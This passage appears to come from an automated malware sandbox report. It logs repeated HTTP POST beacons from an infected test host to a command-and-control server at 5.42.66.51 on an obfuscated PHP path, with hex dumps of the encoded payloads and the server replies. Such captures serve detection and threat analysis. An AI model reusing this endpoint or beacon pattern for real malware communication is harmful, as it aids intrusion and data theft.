                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0
                                                                                                Oct 11, 2024 20:39:19.409501076 CEST225INHTTP/1.1 100 Continue
                                                                                                Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 31 20 4f 63 74 20 32 30 32 34 20 31 38 3a 33 39 3a 31 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 11 Oct 2024 18:39:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                89192.168.2.5500745.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:20.143306971 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:20.498450994 CEST2552OUTData Raw: 59 5c 43 5a 5f 52 50 5f 54 57 5b 54 52 5f 57 55 58 51 58 55 5b 5f 55 5c 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y\CZ_RP_TW[TR_WUXQXU[_U\_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.C3#*->%4Y')5\83+=:7)R.[:)?9"_$,P,'
                                                                                                Oct 11, 2024 20:39:20.825778961 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:20.959110975 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:20 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                90192.168.2.5500755.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:21.480437994 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:21.826463938 CEST2156OUTData Raw: 5c 59 43 5a 5f 5c 50 5e 54 57 5b 54 52 5c 57 5c 58 51 58 5e 5b 5d 55 5f 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \YCZ_\P^TW[TR\W\XQX^[]U__[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.0X?+"?&?',258/08\)=#()-:)1-;"_$,P,+
                                                                                                Oct 11, 2024 20:39:22.174992085 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:22.316065073 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:22 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 58 22 3f 0e 07 3d 33 0c 09 2e 3a 22 0c 25 0c 0c 5f 25 06 28 06 23 3a 3c 10 2e 10 0d 12 25 39 33 10 3d 3f 3a 1f 24 01 27 12 27 11 2b 5d 0d 10 25 02 33 20 3a 13 2b 38 0e 1d 2d 2e 0f 03 30 2d 25 05 35 00 3f 52 21 00 25 5a 25 3c 27 0a 32 03 22 08 3f 24 26 04 38 3c 09 5e 31 3e 2f 55 0f 11 3b 0c 26 01 1a 12 21 2e 2f 55 37 01 23 00 23 2f 29 07 34 0d 3f 10 31 04 24 04 25 3c 21 00 3d 23 38 0f 29 21 39 5e 31 3a 00 0f 3c 18 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989X"?=3.:"%_%(#:<.%93=?:$''+]%3 :+8-.0-%5?R!%Z%<'2"?$&8<^1>/U;&!./U7##/)4?1$%<!=#8)!9^1:<"S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                91192.168.2.5500765.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:22.262145042 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:22.610049963 CEST2552OUTData Raw: 5c 5a 46 5a 5f 5e 50 58 54 57 5b 54 52 57 57 55 58 5f 58 5d 5b 58 55 56 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \ZFZ_^PXTW[TRWWUX_X][XUV_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.E'))>T*<Z0?[!5 ;#4Z)W78!-=*!$[:;"_$,P,
                                                                                                Oct 11, 2024 20:39:25.955549002 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:26.083190918 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:25 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                92192.168.2.5500775.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:23.199546099 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:23.545025110 CEST2156OUTData Raw: 59 58 43 5e 5f 58 50 5a 54 57 5b 54 52 5b 57 57 58 5f 58 5f 5b 5f 55 5b 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YXC^_XPZTW[TR[WWX_X_[_U[_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.D0+=]%>%(X3?5,U'=(%V!+=W-=)W79"_$,P,7
                                                                                                Oct 11, 2024 20:39:23.878871918 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:24.004137039 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:23 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 3a 00 21 59 2b 5d 28 33 3a 0e 2e 2a 22 0c 25 21 3e 5c 27 3b 2b 17 23 39 34 5a 39 00 2b 54 25 29 37 11 29 02 31 0b 24 2c 3c 03 33 3b 2b 5d 0d 10 25 07 27 23 3d 00 2a 16 2f 0f 3a 10 3a 13 27 2e 35 03 21 2d 33 16 22 10 00 04 25 2c 28 1b 25 3e 39 56 2b 1a 0c 04 2c 2f 2b 5f 26 14 2f 55 0f 11 38 52 26 11 16 12 36 2d 3b 11 23 11 0a 5e 37 3c 31 00 20 23 28 01 31 04 23 1f 26 3c 2a 5e 28 20 3c 0a 3e 0c 08 04 26 3a 08 0f 2b 18 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 98:!Y+](3:.*"%!>\';+#94Z9+T%)7)1$,<3;+]%'#=*/::'.5!-3"%,(%>9V+,/+_&/U8R&6-;#^7<1 #(1#&<*^( <>&:+"S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                93192.168.2.5500785.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:24.675868988 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2140
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:25.029625893 CEST2140OUTData Raw: 5c 5a 46 5b 5f 5b 55 54 54 57 5b 54 52 5e 57 52 58 5e 58 5e 5b 59 55 57 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \ZF[_[UTTW[TR^WRX^X^[YUW_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.D%93?;"=%8^$/.X"C;,#')9P +).*?!#.;"_$,P,;
                                                                                                Oct 11, 2024 20:39:25.359827042 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:25.491622925 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:25 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 5b 35 01 05 59 3e 1d 2a 09 2f 04 2d 13 31 32 39 00 26 3b 3f 5d 21 2a 28 11 2c 3d 2f 55 32 14 37 12 2b 3f 36 1d 30 2f 05 5e 25 3b 2b 5d 0d 10 26 5d 33 30 21 00 2a 2b 3c 54 2e 3d 36 5f 25 3e 36 5f 21 2e 09 50 36 2e 0f 14 25 02 3c 15 32 03 26 0c 29 27 21 5b 2c 3c 2b 5e 25 3e 2f 55 0f 11 3b 0f 31 06 3f 02 22 13 2f 1e 37 01 0a 1b 23 01 03 01 34 0d 2f 5d 26 3a 24 04 32 02 32 5f 28 30 3f 53 3e 32 0f 15 27 29 29 51 3c 22 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989[5Y>*/-129&;?]!*(,=/U27+?60/^%;+]&]30!*+<T.=6_%>6_!.P6.%<2&)'![,<+^%>/U;1?"/7#4/]&:$22_(0?S>2'))Q<""S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                94192.168.2.5500795.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:26.146728992 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:26.504565954 CEST2156OUTData Raw: 59 5e 43 5e 5f 5a 50 59 54 57 5b 54 52 5a 57 52 58 54 58 5b 5b 5d 55 5d 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y^C^_ZPYTW[TRZWRXTX[[]U]_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-$=(:V>60.[5%#[83;*(-!;1Q.[9[>:;"_$,P,3
                                                                                                Oct 11, 2024 20:39:29.857270956 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:29.997654915 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:29 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 5a 22 59 2b 58 2a 0d 3a 0d 2c 14 00 09 31 32 32 14 27 28 05 5d 22 2a 12 10 2c 2d 3f 1f 32 04 02 02 2b 3c 00 56 33 3f 34 07 24 01 2b 5d 0d 10 25 05 27 33 21 02 3d 38 0e 12 39 07 2a 59 30 3d 36 5c 21 58 3b 50 35 3d 3d 5f 31 02 0d 0f 31 13 22 0f 29 27 3a 02 2c 3c 33 15 24 2e 2f 55 0f 11 38 1e 27 3c 20 13 23 2d 2f 11 20 01 01 07 20 11 36 13 34 1d 2f 12 24 2a 0e 04 31 02 03 00 2a 23 38 0b 3d 31 21 1a 27 3a 0b 55 3f 32 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989Z"Y+X*:,122'(]"*,-?2+<V3?4$+]%'3!=89*Y0=6\!X;P5==_11")':,<3$./U8'< #-/ 64/$*1*#8=1!':U?2"S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                95192.168.2.5500805.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:26.874121904 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:27.232511997 CEST2552OUTData Raw: 59 5c 46 5b 5f 5a 55 5f 54 57 5b 54 52 56 57 51 58 54 58 5c 5b 5f 55 58 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y\F[_ZU_TW[TRVWQXTX\[_UX_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-'(Y*+.=%<^$6Z6%$83)&#!.[5X?1.+"_$,P,
                                                                                                Oct 11, 2024 20:39:27.586719036 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:27.721393108 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:27 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                96192.168.2.5500815.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:28.563692093 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:28.920068979 CEST2552OUTData Raw: 5c 59 46 5f 5f 52 50 5a 54 57 5b 54 52 5c 57 56 58 57 58 5a 5b 54 55 5a 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \YF__RPZTW[TR\WVXWXZ[TUZ_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-$: Z*:P*57$/*Z6#[,#*7":=**!7-"_$,P,+
                                                                                                Oct 11, 2024 20:39:29.250142097 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:29.380014896 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:29 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                97192.168.2.5500825.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:29.526647091 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:29.873183012 CEST2552OUTData Raw: 59 53 43 5d 5a 5a 55 5f 54 57 5b 54 52 5f 57 55 58 57 58 5f 5b 58 55 57 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YSC]ZZU_TW[TR_WUXWX_[XUW_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-%:4]=W=?3Y*]!C ,$Z>-U#P,-6*,[9"_$,P,'
                                                                                                Oct 11, 2024 20:39:30.414608002 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:30.415333033 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:30 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0
                                                                                                Oct 11, 2024 20:39:30.415366888 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:30 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                98192.168.2.5500835.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:30.549365044 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:30.904395103 CEST2544OUTData Raw: 5c 5f 43 5d 5f 5a 55 54 54 57 5b 54 52 5e 57 54 58 52 58 5f 5b 5a 55 5c 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \_C]_ZUTTW[TR^WTXRX_[ZU\_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.D39?);%=4X'?&X"#,U<[=+&4;1R,=*;:;"_$,P,3
                                                                                                Oct 11, 2024 20:39:31.242057085 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:31.376076937 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:31 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                99192.168.2.5500845.42.66.5180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:39:30.636822939 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:39:30.982609034 CEST2156OUTData Raw: 5c 5d 46 58 5f 52 50 59 54 57 5b 54 52 5c 57 51 58 5e 58 5a 5b 54 55 59 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \]FX_RPYTW[TR\WQX^XZ[TUY_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.'4[>(>U)<Y'6Y/8X=.781:=1=$.+"_$,P,+
                                                                                                Oct 11, 2024 20:39:31.332906961 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:39:31.467992067 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:39:31 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
